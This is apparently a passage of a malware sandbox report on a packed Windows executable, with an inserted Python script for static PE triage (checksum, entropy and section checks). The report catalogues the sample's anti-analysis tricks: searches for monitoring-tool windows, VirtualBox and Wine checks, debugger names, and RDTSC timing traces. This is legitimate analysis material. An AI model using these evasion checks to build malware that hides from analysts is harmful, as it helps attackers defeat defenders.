Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_0174619D push edi; iretd 0_3_017461CB
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_01746057 pushad ; retf 0_3_01746095
Source: JbN2WYseAr.exe | Static PE information: section name: ptayyfsq entropy: 7.95564888988546
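The static findings listed above (file and raw section sizes over 1 MiB, an entry point in .taggant, a stored checksum that does not match the file, two unnamed sections next to randomly named ones, and the near-8-bit entropy of ptayyfsq) are all cheap to reproduce on any PE32 without a sandbox. The script below is an added example, not Joe Sandbox code and not part of this report: it walks the headers with struct alone (no pefile), computes the same checksum fold that pefile's generate_checksum implements, and applies the report's 0x100000 raw-size bound plus an entropy limit of 7.0 bits that is this example's own choice. build_sample_pe() constructs a toy PE32 image purely as test input; it is not the analysed sample.

```python
import math
import struct

# Names a linker normally emits; anything else is reported, as the report does.
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".CRT"}
RAW_SIZE_LIMIT = 0x100000   # the 1 MiB bound the report applies to raw sizes
ENTROPY_LIMIT = 7.0         # example's own bound; packed payloads usually exceed it


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """CheckSumMappedFile fold: every dword except the CheckSum field itself,
    folded to 16 bits with carries, plus the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset & ~3:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data: bytes) -> dict:
    """Minimal PE32 header walk: entry RVA, stored checksum, section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24                                   # optional header start
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    stored = struct.unpack_from("<I", data, opt + 64)[0]
    sections = []
    for k in range(nsections):
        hdr = opt + opt_size + 40 * k
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, hdr)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "raw_size": raw_size,
                         "entropy": shannon_entropy(data[raw_ptr:raw_ptr + raw_size])})
    return {"entry_rva": entry_rva, "stored_checksum": stored,
            "computed_checksum": pe_checksum(data, opt + 64), "sections": sections}


def triage(data: bytes) -> list:
    """Findings phrased like the report's 'Static PE information' lines."""
    info = parse_pe(data)
    findings = []
    if info["stored_checksum"] != info["computed_checksum"]:
        findings.append("real checksum: 0x%x should be: 0x%x"
                        % (info["stored_checksum"], info["computed_checksum"]))
    entry_section = None
    for s in info["sections"]:
        if s["va"] <= info["entry_rva"] < s["va"] + max(s["vsize"], s["raw_size"]):
            entry_section = s["name"]
        if s["name"] not in STANDARD_SECTIONS:
            findings.append("non-standard section name: %r" % s["name"])
        if s["raw_size"] > RAW_SIZE_LIMIT:
            findings.append("raw size of %r is bigger than 0x%x: 0x%x"
                            % (s["name"], RAW_SIZE_LIMIT, s["raw_size"]))
        if s["entropy"] > ENTROPY_LIMIT:
            findings.append("section %r entropy: %.2f" % (s["name"], s["entropy"]))
    if entry_section not in STANDARD_SECTIONS:
        findings.append("entry point in non-standard section: %r" % entry_section)
    return findings


def build_sample_pe(sections, entry_rva, stored_checksum=None) -> bytes:
    """Constructed toy PE32 image (test input only, not a real binary).
    sections: list of (name, payload). stored_checksum=None writes the correct
    value; an int plants a wrong one the way a packer leaves it."""
    file_align, sect_align = 0x200, 0x1000
    hdr_len = -(-(0x40 + 4 + 20 + 0xE0 + 40 * len(sections)) // file_align) * file_align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)               # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, sect_align, file_align)
    struct.pack_into("<I", opt, 60, hdr_len)                 # SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                       # Subsystem: Windows GUI
    struct.pack_into("<H", opt, 92, 16)                      # NumberOfRvaAndSizes
    table, body, va, raw_ptr = b"", b"", sect_align, hdr_len
    for name, payload in sections:
        padded = payload + b"\0" * (-len(payload) % file_align)
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(payload),
                             va, len(padded), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += padded
        va += -(-len(payload) // sect_align) * sect_align
        raw_ptr += len(padded)
    struct.pack_into("<I", opt, 56, va)                      # SizeOfImage
    image = bytearray(dos + b"PE\0\0" + coff + opt + table)
    image += b"\0" * (hdr_len - len(image)) + body
    csum_off = 0x40 + 4 + 20 + 64                            # OptionalHeader.CheckSum
    value = pe_checksum(bytes(image), csum_off) if stored_checksum is None else stored_checksum
    struct.pack_into("<I", image, csum_off, value)
    return bytes(image)


if __name__ == "__main__":
    sample = build_sample_pe([(".text", b"\x90" * 100 + b"\xC3"),
                              ("ptayyfsq", bytes(range(256)) * 16)],
                             entry_rva=0x2000, stored_checksum=0x4586D9)
    for line in triage(sample):
        print(line)
```

Run against a real file, `triage(open(path, "rb").read())` prints the same four classes of finding the report shows; the entropy bound is the only subjective knob, and packers that pad a section with zeros to defeat it will show up through the size and entry-point checks instead.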

Boot Survival

Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\JbN2WYseAr.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PROCMON.EXE
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: X64DBG.EXE
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WINDBG.EXE
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: B29B7D second address: B29B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: B29B8A second address: B29B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F953D015236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB59B0 second address: CB59C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F953D46ED9Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB59C6 second address: CB59CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: C9FA3B second address: C9FA41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB4979 second address: CB497D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB50E8 second address: CB5101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB5101 second address: CB5105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB5242 second address: CB5246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB5246 second address: CB524C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB524C second address: CB5255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB5255 second address: CB526F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D01523Bh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F953D015236h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB526F second address: CB5279 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F953D46ED96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7868 second address: CB7884 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F953D015238h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jc 00007F953D015244h 0x00000013 pushad 0x00000014 jng 00007F953D015236h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7884 second address: CB789C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a pushad 0x0000000b jns 00007F953D46ED96h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB789C second address: CB78A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB78A0 second address: CB78BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F953D46EDA0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB78BD second address: CB78C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB78C3 second address: CB78C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB78C8 second address: CB78EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D01523Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jl 00007F953D015244h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB78EB second address: CB78EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB78EF second address: B29B7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jc 00007F953D01523Ch 0x0000000e mov ecx, dword ptr [ebp+122D2B44h] 0x00000014 pop edx 0x00000015 push dword ptr [ebp+122D0071h] 0x0000001b mov edi, dword ptr [ebp+122D2C14h] 0x00000021 call dword ptr [ebp+122D3A25h] 0x00000027 pushad 0x00000028 jp 00007F953D01523Ch 0x0000002e xor eax, eax 0x00000030 pushad 0x00000031 je 00007F953D015244h 0x00000037 adc di, 0848h 0x0000003c popad 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jmp 00007F953D015248h 0x00000046 mov dword ptr [ebp+122D2A74h], eax 0x0000004c stc 0x0000004d mov esi, 0000003Ch 0x00000052 jng 00007F953D01523Ch 0x00000058 sub dword ptr [ebp+122D37BEh], edx 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 pushad 0x00000063 or dword ptr [ebp+122D37BEh], edi 0x00000069 mov esi, dword ptr [ebp+122D2A94h] 0x0000006f popad 0x00000070 lodsw 0x00000072 pushad 0x00000073 cmc 0x00000074 mov eax, dword ptr [ebp+122D2D1Ch] 0x0000007a popad 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f clc 0x00000080 mov dword ptr [ebp+122D37BEh], edx 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a cld 0x0000008b nop 0x0000008c push eax 0x0000008d push ebx 0x0000008e push eax 0x0000008f push edx 0x00000090 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB796B second address: CB7979 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F953D46ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7979 second address: CB797D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB797D second address: CB79B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov edx, dword ptr [ebp+122D2D64h] 0x00000011 mov di, cx 0x00000014 push 00000000h 0x00000016 mov edx, 4718476Dh 0x0000001b call 00007F953D46ED99h 0x00000020 pushad 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB79B5 second address: CB79E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F953D015248h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB79E0 second address: CB79E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB79E5 second address: CB79F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB79F5 second address: CB7A79 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007F953D46EDA3h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 ja 00007F953D46ED9Ch 0x0000001f push esi 0x00000020 jmp 00007F953D46ED9Ah 0x00000025 pop esi 0x00000026 popad 0x00000027 pop eax 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F953D46ED98h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 push 00000003h 0x00000044 or si, CFD9h 0x00000049 push 00000000h 0x0000004b movsx esi, di 0x0000004e push 00000003h 0x00000050 push eax 0x00000051 or esi, dword ptr [ebp+122D2B38h] 0x00000057 pop ecx 0x00000058 push 5E8B370Bh 0x0000005d push esi 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7A79 second address: CB7A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7B6B second address: CB7BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop esi 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D39FBh] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F953D46ED98h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 jmp 00007F953D46ED9Dh 0x00000038 jl 00007F953D46EDA2h 0x0000003e jmp 00007F953D46ED9Ch 0x00000043 push C7D88FA9h 0x00000048 push eax 0x00000049 push edx 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d pop edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7CF4 second address: CB7CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7D6D second address: CB7D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7D71 second address: CB7D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7D75 second address: CB7DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F953D46ED9Dh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F953D46ED98h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ecx, 71DDC231h 0x0000002d push 00000000h 0x0000002f mov edx, edi 0x00000031 call 00007F953D46ED99h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7DC3 second address: CB7DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7DC8 second address: CB7DDB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F953D46ED98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7DDB second address: CB7E0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F953D015243h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F953D01523Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7E0A second address: CB7E18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7E18 second address: CB7E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7E1C second address: CB7EB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jnl 00007F953D46EDA3h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F953D46ED98h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D1BF5h], edx 0x00000032 push 00000003h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F953D46ED98h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e mov dh, al 0x00000050 push 00000000h 0x00000052 sbb dh, FFFFFFA1h 0x00000055 push 00000003h 0x00000057 jmp 00007F953D46ED9Fh 0x0000005c push C7461971h 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 jne 00007F953D46ED96h 0x0000006a pushad 0x0000006b popad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CC9B08 second address: CC9B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD7E66 second address: CD7E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD7E6C second address: CD7E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F953D015236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD7E76 second address: CD7EA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F953D46ED9Ch 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jmp 00007F953D46EDA0h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD801E second address: CD8036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D015244h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD8036 second address: CD803A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD803A second address: CD8044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD848D second address: CD8499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F953D46ED96h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD8499 second address: CD849D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
